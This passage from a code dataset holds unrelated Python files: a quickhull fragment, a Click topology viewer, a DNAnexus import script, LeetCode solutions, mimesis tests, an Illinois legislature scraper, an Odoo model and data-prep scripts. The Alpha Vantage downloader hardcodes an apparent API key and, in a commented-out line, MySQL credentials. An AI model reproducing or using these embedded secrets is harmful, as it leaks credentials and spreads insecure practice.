if the line forms a counter clock wise turn\r\n    return (((B[0] - A[0])*(Y[1] - A[1]) -\r\n             ((B[1] - A[1])*(Y[0] - A[0])))) > 0","sub_path":"quickhull.py","file_name":"quickhull.py","file_ext":"py","file_size_in_byte":2772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"576393390","text":"#\n# Copyright 2017 CNIT - Consorzio Nazionale Interuniversitario per le Telecomunicazioni\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#     http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nfrom parserClick import *\nfrom xml2py import *\nimport argparse\nimport sys\nimport networkx as nx\nimport matplotlib.pyplot as plt\nfrom parserView import *\nfrom parserAllView import *\nfrom parserDetailView import *\n\n\n\ndef run_command(data,nx_topology):\n\t\n\tif args.type_view == 'View':\n\t\tparserView(args.file, nx_topology)\n\t\n\telif args.type_view == 'AllView':\n\t\tparserAllView(args.file, nx_topology)\n\telif args.type_view == 'DetailView':\n\t\tparserDetailView(args.file, nx_topology)\n\n\t#parse_click(args.file, nx_topology)\n\n\n\t#add_edge_nodes(nx_topology)\n\t#flow_allocator(args.controllerRestIp)\n\t#simulate_flow_allocator(nx_topology, args.file)\n\ndef parse_cmd_line():\n\tparser = argparse.ArgumentParser(description='')\n\tparser.add_argument('--f', dest='file', action='store', help='click file to parse')\n\tparser.add_argument('--show',dest='type_view', action='store', help='view type to display [View - AllView - DetailView]')\n\targs = parser.parse_args() \n\n\tif len(sys.argv)<2:\n\t\tparser.print_help()\n\t\tsys.exit(1) \n\t\n\tif args.type_view != 'View' and args.type_view != 'AllView' and args.type_view != 'DetailView':\n\t\tparser.print_help()\n\t\tsys.exit(1) \n\t\n\n\treturn args\n\n\t\n\t\nif __name__ == '__main__':\n\n\tnx_topology = nx.MultiDiGraph()\n\targs = 
parse_cmd_line()\n\trun_command(args,nx_topology)\n\tif len(nx_topology)!=0:\n\t\txml2py(nx_topology)\n\t\t#for node in nx_topology.nodes_iter(data = True):\n\t\t\t\t#print node[1]['element'] +' '+ node[1]['portcount'] +' '+ node[1]['flowcode'] +' '+node[1]['processing']\n\t\tnx.draw(nx_topology)\n\t\tplt.show() \n","sub_path":"code/lib/clickparser/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"319148982","text":"#!/usr/bin/env python3\n\n###\n#Nathaniel Watson\n#Stanford School of Medicine\n#Nov. 6, 2018\n#nathankw@stanford.edu\n###\n\n\"\"\"\nChecks DNAnexus for new sequencing result projects and imports metadata (i.e. number of reads) into\nPulsar by creating a SequencingRun object if necessary and one or more SequencingResult objects. \n\nSee wiki documentation in the pulsar_lims GitHub repo at https://github.com/nathankw/pulsar_lims/wiki/Importing-Sequencing-Results.\n\nIf the --log-s3 flag is set, then the log files will be uploaded to S3 in the bucket specified by the\nenvironment variable PULSARPYDX_S3. The log files will be stored in this bucket by timestamp.\n\"\"\"\n\nimport argparse\nimport datetime\nimport time\nimport logging\nimport os\n\nimport boto3\nimport dxpy\n\nimport pulsarpy.models\nimport pulsarpy.utils\nfrom pulsarpy.elasticsearch_utils import MultipleHitsException\nimport scgpm_seqresults_dnanexus.dnanexus_utils as du\nfrom pulsarpy_dx import logger, LOG_DIR\nimport pulsarpy_dx.utils as utils\n\n\n#The environment module gbsc/gbsc_dnanexus/current should also be loaded in order to log into DNAnexus\n\nENCODE_ORG = \"org-snyder_encode\"\n\ndef get_parser():\n parser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.RawTextHelpFormatter)\n parser.add_argument('-d',\"--days-ago\",type=int,default=30, help=\"\"\"\n The number of days ago to query for new projects that are billed to {}.\"\"\".format(ENCODE_ORG)\n )\n parser.add_argument(\"--log-s3\", action=\"store_true\", help=\"\"\"\n Presence of this option means to upload the log files to the S3 bucket indicated by the\n environment variable PULSARPYDX_S3.\"\"\"\n )\n return parser\n\ndef main():\n parser = get_parser()\n args = parser.parse_args()\n log_s3 = args.log_s3\n days_ago = args.days_ago \n since_datetime = datetime.datetime.utcnow() - datetime.timedelta(days=days_ago)\n since_timestamp_milliseconds = int(since_datetime.timestamp() * 1000)\n \n projects = dxpy.api.org_find_projects(object_id=ENCODE_ORG, input_params={\"created\": {\"after\": since_timestamp_milliseconds}})\n projects = projects[\"results\"]\n # projects is a list of dicts (was a generator)\n num_projects = len(projects)\n logger.debug(\"Found {} projects.\".format(num_projects))\n if projects:\n for i in range(num_projects):\n logger.debug(\"{}. 
{}\".format(str(i + 1), projects[i][\"id\"]))\n else: \n return\n\n for i in projects:\n proj_id = i[\"id\"]\n print(proj_id)\n du.share_with_org(project_ids=[proj_id], org=ENCODE_ORG, access_level=\"CONTRIBUTE\")\n try:\n utils.import_dx_project(proj_id)\n except utils.MissingSequencingRequest:\n logger.error(\"No SequencingRequest for DNAnexus project {}.\".format(proj_id))\n except Exception as e:\n # Send email with error details to Admin\n body = \"Error importing sequencing results for DNAnexus project {}.\\n\\n\".format(proj_id)\n body += e.__class__.__name__ + \": \" + str(e)\n logger.error(body)\n form = {\n \"subject\": \"Error in import_seq_results.py\",\n \"text\": body,\n \"to\": pulsarpy.DEFAULT_TO,\n }\n res = pulsarpy.utils.send_mail(form=form, from_name=\"import_seq_results\")\n finally:\n if log_s3:\n s3 = boto3.resource('s3')\n bucket = s3.Bucket(os.environ[\"PULSARPYDX_S3\"])\n # Add subfolder for the present day\n upload_folder = str(datetime.date.today()) + \"/\"\n bucket.put_object(Key=upload_folder) # put_object() is idempotent\n today_logs = os.path.join(LOG_DIR)\n for logfile in os.listdir(today_logs):\n filepath = os.path.join(today_logs, logfile)\n key = os.path.join(upload_folder, logfile)\n bucket.upload_file(Key=key, Filename=filepath) \n \n\n\ndef get_read_stats(barcode_stats, read_num):\n \"\"\"\n .. deprecated:: 0.1.0\n Read stats are now parsed from the output of Picard Tools's CollectAlignmentSummaryMetrics.\n Such files are also stored in the DNAnexus projects created by GSSC. \n\n Each barcoded library in a DNAnexus project from GSSC contains a ${barcode}_stats.json file, where ${barcode} is a \n barcode sequence, that has read-level stats. This function accepts a barcode-specific hash \n from that file and parses out some useful read-based stats for the given read number. \n An example of a barcode_stats.json file is provided in the data subdirectory of this script.\n\n Args:\n barcode_stats: `dict`. The JSON-loaded content of a particular ${barcode}_stats.json file. \n See `scgpm_seqresults_dnanexus.dnanexus_utils.DxSeqResults.get_barcode_stats()` for\n more details.\n read_num: `int`. The read number (1 or 2) for which you need read stats.\n \"\"\"\n read_num_key = \"Read {}\".format(read_num)\n read_hash = barcode_stats[read_num_key]\n stats = {}\n stats[\"pass_filter\"] = read_hash[\"Post-Filter Reads\"]\n return stats\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"pulsarpy_dx/scripts/import_seq_results.py","file_name":"import_seq_results.py","file_ext":"py","file_size_in_byte":5169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"606063636","text":"from typing import List\n\n\nclass Solution:\n def minPathSum(self, grid: List[List[int]]) -> int:\n M = len(grid) # rows\n N = len(grid[0]) # columns\n\n for y in range(M):\n for x in range(N):\n if x == 0 and y == 0:\n continue\n if x > 0 and y == 0:\n grid[0][x] += grid[0][x - 1]\n elif y > 0 and x == 0:\n grid[y][0] += grid[y - 1][0]\n else:\n grid[y][x] += min(grid[y][x - 1], grid[y - 1][x])\n\n return grid[-1][-1]","sub_path":"leetcode/p0064_minimum_path_sum/my_attempt2.py","file_name":"my_attempt2.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"547371551","text":"\"\"\"\nhttps://leetcode.com/problems/sort-list/\n\nDivide and conquer. 
Find the mid of the linked list, cut, then sort the two sublists, then merge.\n\nTime complexity: O(NlogN)\n\"\"\"\n# Definition for singly-linked list.\n# class ListNode:\n#     def __init__(self, val=0, next=None):\n#         self.val = val\n#         self.next = next\nclass Solution:\n    def sortList(self, head: ListNode) -> ListNode:\n        if not head or not head.next:\n            return head\n\n        pre, slow, fast = None, head, head\n        while fast and fast.next:\n            pre, slow = slow, slow.next\n            fast = fast.next.next\n        pre.next = None\n\n        return self.merge(self.sortList(head), self.sortList(slow))\n\n    def merge(self, h1, h2):\n        dummy = ListNode(None)\n        curr = dummy\n        while h1 and h2:\n            if h1.val < h2.val:\n                curr.next = h1\n                curr = curr.next\n                h1 = h1.next\n            else:\n                curr.next = h2\n                curr = curr.next\n                h2 = h2.next\n\n        curr.next = h1 or h2\n\n        return dummy.next\n","sub_path":"0148_SortList.py","file_name":"0148_SortList.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"649808349","text":"#!/Users/VK/anaconda/bin/python\n\n#import pandas as pd\nfrom alpha_vantage.timeseries import TimeSeries\nimport datetime\nimport pymysql\nimport time\n\ndef getData(SYMBOL):\n    rundate = datetime.datetime.now()\n    date = rundate.date()\n\n    ts = TimeSeries(key='DD1FH080AL5OJ6XF', output_format='pandas')\n    data, meta_data = ts.get_intraday(symbol=SYMBOL, interval='1min', outputsize='full')\n    csv_file = '/Users/VK/Desktop/UChicago/Capstone/data/MAY_3RD_WEEK/' + str(SYMBOL) + '.csv'\n    print (csv_file)\n    data.to_csv(csv_file)\n\nif __name__ == \"__main__\":\n\n    #db = pymysql.connect(\"localhost\", \"root2\", \"root123!\", \"US_STOCK_DATA\")\n    #cursor = db.cursor()\n\n    #query = 'SELECT index_name FROM Indices'\n    #cursor.execute(query)\n\n    symbols = ['VIX','GSPC','SPY']\n\n    for sym in symbols:\n        indice = sym\n        getData(indice)\n\n'''\n    dow_query = \"\"\"\n    SELECT Symbol from dow30 where Symbol like 'X%' order by Symbol\n    \"\"\"\n    cursor.execute(dow_query)\n\n    time.sleep(30)\n    for dow in cursor:\n        symbol = dow[0]\n        getData(symbol)\n        time.sleep(30) # alpha vantage does not like bots querying 5 or more symbols in under a minute\n\n'''\n","sub_path":"bin/ETL/getDataFromAlphaVantage.py","file_name":"getDataFromAlphaVantage.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"591449257","text":"import struct\n\nimport uri\nimport handshake\nimport framing\nimport eventloop\nfrom MsgQueue import MsgQueue\n\n\nCONTROL_FRAMES = {0x8: 'Close', 0x9: 'Ping', 0xA: 'Pong'}\nDATA_FRAMES = {0x0: 'Fragment', 0x1: 'Text', 0x2: 'Binary'}\nSTATUS_CODES = {1000: 'Normal', 1001: 'Going away', 1002: 'Protocol error', 1003: 'Invalid data type received',\n                1005: 'No close reason provided', 1006: 'Connection closed unexpectedly',\n                1007: 'Non-UTF8 encoded data', 1008: '', 1009: 'Data too large', 1010: 'Wrong extension list',\n                1011: 'Unexpected', 1015: 'TLS handshake failed'}\n\n\nclass SocketStateError(RuntimeError):\n    pass\n\n\nclass WebSocketClient:\n    def __init__(self, ws_uri):\n        if not isinstance(ws_uri, str):\n            raise TypeError('Unsupported type for WebSocket URI. 
Must be a string.')\n        self.ws_uri = uri.construct_ws_uri(ws_uri)\n        self.key = handshake.generate_client_key()\n        self.queue = MsgQueue(b'', wsclient=self)\n\n        self._state = 'CLOSED'  # CONNECTING, OPEN, CLOSING, CLOSED\n        self._close_code = 1006\n        self._close_reason = ''\n        self.headers = {}\n\n        self._wsock = None\n        self._loop = eventloop.get_event_loop()\n\n        self.ping_msg = b''\n\n    def check_arg(self, arg):\n        if isinstance(arg, str):\n            arg = arg.encode()\n        if not isinstance(arg, bytes):\n            raise TypeError('Method requires a string or bytes type object')\n\n        return arg\n\n    async def _do_handshake(self):\n        self.headers = handshake.create_opening_handshake(ws_uri=self.ws_uri, key=self.key)\n        sock, resp_headers = await handshake.send_upgrade_request(ws_uri=self.ws_uri, headers=self.headers)\n\n        if not handshake.validate_server_response(resp=resp_headers, original_key=self.key):\n            raise ValueError('Invalid response from the server')\n        return sock\n\n    async def connect(self):\n        if self._state != 'CLOSED':\n            raise RuntimeError('You cannot use the same connection twice!')\n        self._state = 'CONNECTING'\n        self._wsock = await self._do_handshake()\n        self._state = 'OPEN'\n\n    async def _recv(self, buff_size=1024):\n        if self._state not in ('OPEN', 'CLOSING'):\n            raise RuntimeError('Trying to read from socket in {} state'.format(self._state))\n\n        data = await self._loop.sock_recv(sock=self._wsock, buff_size=buff_size)\n        if not data:\n            raise RuntimeError('WebSocket closed unexpectedly')\n        self.queue.extend(data)\n\n    async def recv(self):\n        if self._state != 'OPEN' and self._state != 'CLOSING':\n            raise RuntimeError('Trying to read from socket in {} state'.format(self._state))\n\n        fin, opcode, payload = await framing.parse_message(data=self.queue, client=self)\n        if opcode in CONTROL_FRAMES:\n            await self._handle_control_frame(fin=fin, opcode=CONTROL_FRAMES[opcode], payload=payload)\n        elif opcode in DATA_FRAMES:\n            if not fin:\n                payload += await self.recv()  # TODO: control frames may arrive between msgs\n            return payload.decode() if opcode == 1 else payload\n        else:\n            await self.close(code=1002, timeout=0)\n            raise RuntimeError('Invalid opcode received')\n\n    async def send(self, msg, max_chunk_size=512):\n        msg = self.check_arg(msg)\n        if self._state != 'OPEN':\n            raise RuntimeError('Trying to write to socket in {} state'.format(self._state))\n\n        if len(msg) > max_chunk_size:\n            msgs = [msg[i:i+max_chunk_size] for i in range(0, len(msg), max_chunk_size)]\n\n            first_fragment = framing.compose_message(payload=msgs[0], mask=True, fin=False)\n            middle_fragments = (framing.compose_message(payload=msg, mask=True, fin=False, opcode=0)\n                                for msg in msgs[1:-1])\n            final_fragment = framing.compose_message(payload=msgs[-1], mask=True, fin=True, opcode=0)\n\n            await self._loop.sock_send(sock=self._wsock, data=first_fragment)\n            for frag in middle_fragments:\n                await self._loop.sock_send(sock=self._wsock, data=frag)\n            await self._loop.sock_send(sock=self._wsock, data=final_fragment)\n\n        else:\n            data = framing.compose_message(payload=msg, mask=True)\n            await self._loop.sock_send(sock=self._wsock, data=data)\n\n    async def _handle_control_frame(self, fin, opcode, payload):\n        if not fin:\n            raise RuntimeError('Invalid frame received')\n        if opcode == 'Close':\n            try:\n                self._close_code = struct.unpack('!H', payload[:2])[0]\n            except struct.error:\n                self._close_code = 1005\n            self._close_reason = payload[2:].decode()\n\n            if self._state != 'CLOSING':\n                await self._send_close_frame(code=1001)\n        elif opcode == 'Ping':\n            await self._pong(payload)\n        elif opcode == 
'Pong':\n            if payload != self.ping_msg:\n                raise RuntimeError('Invalid PONG received')\n            self.ping_msg = b''\n\n    async def ping(self, msg=b''):\n        msg = self.check_arg(msg)\n        if self._state != 'OPEN':\n            raise RuntimeError('Trying to write to socket in {} state'.format(self._state))\n        if self.ping_msg == b'':\n            self.ping_msg = msg\n        await self._loop.sock_send(sock=self._wsock, data=framing.compose_message(payload=msg, opcode=0x9))\n\n    async def _pong(self, msg=b''):\n        if self._state != 'OPEN':\n            raise RuntimeError('Trying to write to socket in {} state'.format(self._state))\n        await self._loop.sock_send(sock=self._wsock, data=framing.compose_message(payload=msg, opcode=0xA, mask=True))\n\n    async def close(self, reason=b'', *, code=1000, timeout=30):\n        reason = self.check_arg(reason)\n\n        await self._send_close_frame(code=code, reason=reason)\n        # TODO: wait Timeout sec\n        if self._state != 'CLOSED':\n            self._close_socket()\n\n    async def _send_close_frame(self, code, reason=b''):\n        self._state = 'CLOSING'\n        payload = struct.pack('!H', code) + reason\n        data = framing.compose_message(payload=payload, opcode=0x8, mask=True)\n        await self._loop.sock_send(sock=self._wsock, data=data)\n        self._wsock.shutdown(1)  # 1 = SHUT_WR\n\n    def _close_socket(self):\n        self._wsock.close()\n        self._state = 'CLOSED'\n\nif __name__ == '__main__':\n    loop = eventloop.get_event_loop()\n    c = WebSocketClient('ws://localhost:8765')\n    loop.create_task(c.connect())\n    loop.run_forever()\n","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":6640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"132111046","text":"# -*- coding: utf-8 -*-\n\nimport re\n\nimport pytest\n\nimport mimesis\nfrom mimesis.data import CALLING_CODES, CONTINENT_CODES, COUNTRIES_ISO\n\nfrom . 
import _patterns as p\n\n\n@pytest.fixture\ndef _address():\n return mimesis.Address()\n\n\ndef test_str(address):\n assert re.match(p.STR_REGEX, str(address))\n\n\ndef test_street_number(_address):\n result = _address.street_number()\n assert re.match(r'[0-9]{1,5}$', result)\n\n\ndef test_latitude(_address):\n result = _address.latitude()\n assert isinstance(result, float)\n assert result <= 90\n assert result >= -90\n\n\ndef test_longitude(_address):\n result = _address.longitude()\n assert isinstance(result, float)\n assert result <= 180\n assert result >= -180\n\n\ndef test_coordinates(_address):\n result = _address.coordinates()\n assert isinstance(result, dict)\n\n latitude = result['latitude']\n assert isinstance(latitude, float)\n assert latitude <= 90\n assert latitude >= -90\n\n longitude = result['longitude']\n assert isinstance(latitude, float)\n assert longitude <= 180\n assert longitude >= -180\n\n\ndef test_street_name(address):\n result = address.street_name()\n assert isinstance(result, str)\n assert result in address.data['street']['name']\n\n\ndef test_street_suffix(address):\n result = address.street_suffix()\n assert isinstance(result, str)\n assert result in address.data['street']['suffix']\n\n\ndef test_address(address):\n result = address.address()\n assert isinstance(result, str)\n assert result is not None\n\n\ndef test_state(address):\n result = address.state()\n assert result in address.data['state']['name']\n\n result_abbr = address.state(abbr=True)\n assert result_abbr in address.data['state']['abbr']\n\n\ndef test_postal_code(address):\n result = address.postal_code()\n current_locale = address.locale\n\n if current_locale in p.POSTAL_CODE_REGEX:\n assert re.match(p.POSTAL_CODE_REGEX[current_locale], result)\n else:\n assert re.match(p.POSTAL_CODE_REGEX['default'], result)\n\n\ndef test_country(address):\n result = address.country()\n assert result in address.data['country']['name']\n\n\n@pytest.mark.parametrize(\n 'fmt, length', [\n ('iso2', 2),\n ('iso3', 3),\n ('numeric', 3),\n ],\n)\ndef test_country_iso(_address, fmt, length):\n iso = _address.country_iso(fmt=fmt)\n\n assert iso in COUNTRIES_ISO[fmt]\n assert len(iso) == length\n\n with pytest.raises(KeyError):\n _address.country_iso(fmt='none')\n\n\ndef test_city(address):\n result = address.city()\n assert result in address.data['city']\n\n\ndef test_continent(address):\n result = address.continent()\n assert result in address.data['continent']\n\n result = address.continent(code=True)\n assert result in CONTINENT_CODES\n\n\ndef test_calling_code(_address):\n result = _address.calling_code()\n assert result is not None\n assert result in CALLING_CODES\n","sub_path":"tests/test_data/test_address.py","file_name":"test_address.py","file_ext":"py","file_size_in_byte":2922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"119648492","text":"powers = list(range(-24, -2, 3)) + list(range(-2, 3, 1)) + list(range(3, 25, 3))\nbases = [10 ** i for i in powers]\nprefixes = (['Ym', 'Zm', 'Em', 'Pm', 'Tm',\n 'Gm', 'Mm', 'km', 'hm', 'dam',\n 'm', 'dm', 'cm', 'mm', 'µm',\n 'nm', 'pm', 'fm', 'am', 'zm', 'ym',])[::-1]\nmetrics = {prefixes[i]: bases[i] for i in range(len(bases))}\n\ndef meters(x):\n ans = ''\n for i, v in metrics.items():\n num = x / v\n if num < 1: break\n if num.is_integer(): num = int(num)\n ans = str(num) + i\n return 
ans\n\nprint(meters(12300000))","sub_path":"Codewars/replacements.py","file_name":"replacements.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"279642464","text":"# Normalizes the entire input to the neural network\n\nimport csv\nimport os\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nimport matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\n\ncwd = os.getcwd()\ndata_csv_path = os.path.join(cwd,'data.csv')\n\n# check if the folder at the given file path exists and make it if it does not\ndef ensure_dir(file_path):\n # directory = os.path.dirname(file_path)\n directory = file_path\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n\n\ndataset = pd.read_csv(data_csv_path).values\n\n### get all the data file names\nX = dataset[:,0]\nY = dataset[:,1]\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y,test_size=0.2)\n\nmean_X = []\nmin_X = []\nmax_X = []\n\ndata_path = os.path.join(cwd,'data')\ndata_path_norm = os.path.join(cwd,'data_norm')\nensure_dir(data_path_norm) # create a folder to store the normalised data if it doesn't exist\n\n\n## find the max and min in the data\nfor file in X:\n X_entry = np.load(data_path+'/'+file)\n max_X.append(np.amax(X_entry))\n min_X.append(np.amin(X_entry))\n\nmax_data = max(max_X)\nmin_data = min(min_X)\n\n\ntotal_length = 0\n\n\n## compute the mean of the data\nfor file in X:\n X_entry = np.load(data_path+'/'+file)\n X_entry_norm = ((X_entry - min_data))/(max_data - min_data)\n mean_X.append(np.sum(X_entry_norm))\n total_length = total_length + X_entry.size\n\nmean_data = np.sum(mean_X)/float(total_length)\n\nensure_dir(data_path_norm)\n\n## normalise the data and store it\nfor file in X :\n X_entry = np.load(data_path+'/'+file)\n X_entry_norm = ((X_entry - min_data))/(max_data - min_data)\n X_entry_norm = X_entry_norm - mean_data\n np.save(data_path_norm+'/'+file,X_entry_norm)\n\n\n","sub_path":"Polyphonic Note Extraction /RNN-LSTM/normalize.py","file_name":"normalize.py","file_ext":"py","file_size_in_byte":1777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"119665431","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 28 14:16:44 2017\n\n@author: Mikey\n\"\"\"\nfrom urllib.request import urlopen\nfrom urllib.error import HTTPError\nfrom bs4 import BeautifulSoup\nfrom time import sleep\nimport re\nimport pdb\nimport databaseSQL as db\n\ndataSen = db.database('senators')\ndataBill = db.database('bills')\ndataHouse = db.database('house')\n\nclass Senator():\n def __init__(self, name, url, comUrl, billUrl, affiliation, district):\n self.name = name\n self.url = url\n self.comUrl = comUrl\n self.billUrl = billUrl\n self.affiliation = affiliation\n self.district = district\n self.committees = {}\n self.bills = []\n \n def addCommittees(self):\n self.committees = getCommittees(self.comUrl, self.name)\n \n def committeeNames(self):\n return self.committees.keys()\n \n def sponsoredBills(self):\n self.bills = getBills(self.billUrl)\n \n def billNames(self):\n return self.bills\n \nclass Bill():\n def __init__(self, name, url, sponsor, description, chamber, action, actionDate, senateSponsors, houseSponsors):\n self.name = name\n self.url = url\n self.sponsor = sponsor\n self.description = description\n self.chamber = chamber\n self.action = action\n self.actionDate = actionDate\n self.senateSponsors = 
senateSponsors\n self.houseSponsors = houseSponsors\n\ndef getBSObject(url):\n \"\"\"\n Prevents errors when looking up webpage\n \"\"\"\n try:\n html = urlopen(url)\n except HTTPError as e:\n return None\n try:\n bsObject = BeautifulSoup(html.read(), \"lxml\")\n except AttributeError as e:\n return None\n return bsObject\n\ndef getSenators():\n curGA= \"http://www.ilga.gov/senate/default.asp\"\n web = getBSObject(curGA)\n table = web.find(\"table\", {\"width\":\"490\"})\n senatorList = []\n for i in table.table.children:\n senatorList.append(i)\n \n for a in senatorList:\n if a == '\\n':\n senatorList.remove(a)\n del senatorList[0]\n del senatorList[0] \n \n govUrl = \"http://www.ilga.gov/senate/\"\n senUrl = \"http://www.ilga.gov\"\n senators = []\n for sen in senatorList:\n temp = sen.findAll('a')\n tempTD = sen.findAll('td')\n senators.append(Senator(temp[0].get_text(), senUrl +temp[0].attrs['href'],\n govUrl + temp[2].attrs['href'], \n govUrl + temp[1].attrs['href'],\n tempTD[4].get_text(), tempTD[3].get_text()))\n temp.clear()\n tempTD.clear()\n \n return senators\n\ndef getHouse():\n curHouseUrl = \"http://www.ilga.gov/house/\"\n web = getBSObject(curHouseUrl)\n table = web.find(\"table\", {\"width\":\"490\"})\n houseList = []\n for i in table.table.children:\n houseList.append(i)\n for a in houseList:\n if a == '\\n':\n houseList.remove(a)\n del houseList[0]\n del houseList[0]\n govUrl = \"http://www.ilga.gov/house/\"\n houseUrl = \"http://www.ilga.gov\"\n house = []\n for hou in houseList:\n temp = hou.findAll('a')\n tempTD = hou.findAll('td')\n house.append(Senator(temp[0].get_text(), houseUrl +temp[0].attrs['href'],\n govUrl + temp[2].attrs['href'], \n govUrl + temp[1].attrs['href'],\n tempTD[4].get_text(), tempTD[3].get_text()))\n temp.clear()\n tempTD.clear()\n return house\n\ndef getCommittees(urlC, repName):\n bs = getBSObject(urlC)\n tab = bs.find(\"table\", {\"cellpadding\":\"3\"})\n coms = []\n for i in tab.children:\n coms.append(i)\n for a in coms:\n if a == '\\n':\n coms.remove(a)\n del coms[0]\n comDict = {}\n leader = False\n for a in coms:\n try:\n if repName == a.td.next_sibling.next_sibling.find('a').get_text():\n leader = True\n else:\n leader = False\n except AttributeError as e:\n print(e)\n leader = False\n comDict[a.td.get_text().strip()] = leader\n return comDict\n \n#Now returns a list of bills the representative is part of and adds the bill\n#and bill details to a database \ndef getBills(representative):\n bs = getBSObject(representative)\n tab = bs.find(\"table\", {\"cellpadding\":\"3\"})\n genUrl = \"http://www.ilga.gov\"\n biList = []\n billNames = []\n for i in tab.children:\n biList.append(i)\n for a in biList:\n if a == '\\n':\n biList.remove(a) \n del biList[0]\n #Doesn't rescrape bills already in database\n for a in biList:\n b = a.findAll(\"td\")\n if dataBill.__contains__(b[0].get_text()) is False:\n billUrl = genUrl + b[0].find('a').attrs['href']\n sleep(1)\n billSoup = getBSObject(billUrl)\n try:\n bill = Bill(b[0].get_text(),\n billUrl,\n b[1].get_text(),\n b[2].get_text(),\n b[3].get_text(),\n b[4].get_text(),\n b[5].get_text(),\n billSponsors(billSoup.findAll('a', {'class':'content'}), \"senate\"),\n billSponsors(billSoup.findAll('a',{'class':'content'}), \"house\"))\n billNames.append(b[0].get_text())\n dataBill[b[0].get_text()] = bill\n print(\"Added: \" + b[0].get_text()) \n except KeyError as e:\n print(e)\n else:\n billNames.append(b[0].get_text())\n print(\"Already contains: \" + b[0].get_text())\n return billNames\n \n \n\ndef 
billSponsors(bill, sponsor):\n pattern = re.compile(\"\\/senate\\/+\")\n repList = []\n if sponsor == 'senate':\n for b in bill:\n if re.match(pattern, b.attrs['href'][0:8]):\n repList.append(b.get_text())\n else:\n return repList\n else:\n for b in bill:\n if re.match(pattern, b.attrs['href'][0:8]):\n continue\n else:\n repList.append(b.get_text())\n return repList\n\ndef scrape_senators():\n sen = getSenators()\n for x in range(0, len(sen)):\n #pdb.set_trace()\n senator = sen[x]\n #If connection times out and have to restart the scrape\n if dataSen.__contains__(senator.name) is False:\n print(senator.name)\n senator.sponsoredBills()\n senator.addCommittees()\n print(\"Received bills and committees\")\n dataSen[senator.name] = senator\n #prevent overuse on ilga\n sleep(1)\n else: \n print(\"Already contains: \" + senator.name)\n #garbage collection - regular for loop for s in sen was acting fishy\n del senator\n \ndef scrape_house():\n house = getHouse()\n for x in range(0, len(house)):\n rep = house[x]\n if dataHouse.__contains__(rep.name) is False:\n print(rep.name)\n rep.sponsoredBills()\n rep.addCommittees()\n print(\"Received bills and committees\")\n dataHouse[rep.name] = rep\n sleep(2)\n else:\n print(\"Already contains: \" + rep.name)\n del rep\n \n \n ","sub_path":"senate.py","file_name":"senate.py","file_ext":"py","file_size_in_byte":7429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"470764563","text":"from odoo import models, fields\nfrom odoo import api\n\nclass StudentInfo(models.Model):\n _name = \"student.information\"\n\n country = [\n (\"india\", \"India\"),\n (\"america\", \"America\"),\n (\"london\", \"London\"),\n (\"china\", \"China\"),\n ]\n status = [\n (\"draft\", \"Draft\"),\n (\"approved\", \"Approved\"),\n (\"cancel\", \"Cancel\"),\n ]\n name = fields.Char()\n Email = fields.Char()\n Mobile = fields.Char()\n Country_id = fields.Many2one(\"res.country\")\n state = fields.Selection(status)\n edu_ids = fields.One2many(\"education.detail\", \"stu_id\")\n login_user=fields.Many2one(\"res.users\",default=lambda self:self.env.user)\n \n\n def draft_action(self):\n print(f\"\\n\\n\\n\\nhi draft\")\n for rec in self:\n rec.write({'state': 'draft'})\n\n def approved_action(self):\n print(f\"\\n\\n\\n\\nhi approved\")\n for rec in self:\n rec.write({'state': 'approved'})\n\n def cancel_action(self):\n print(f\"\\n\\n\\n\\nhi cancel\")\n for rec in self:\n rec.write({'state': 'cancel'})\n\n def reset_action(self):\n print(f\"\\n\\n\\n\\nhi reset\")\n for rec in self:\n rec.write({'state': 'draft'})\n","sub_path":"custom_addons/student_info/models/student_info.py","file_name":"student_info.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"592682934","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 26 16:50:19 2018\n\n@author: user\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\n\ndef get_data():\n # read and store the data\n df=pd.read_csv('ecommerce_data.csv')\n # convert the data into a numpy matrix\n data=df.as_matrix()\n # split the data into dependent variable vector and feature matrix\n X=data[:, :-1]\n Y=data[:, -1]\n # normalize the numerical columns\n X[:, 1]=(X[:, 1]-X[:, 1].mean())/X[:, 1].std()\n X[:, 2]=(X[:, 2]-X[:, 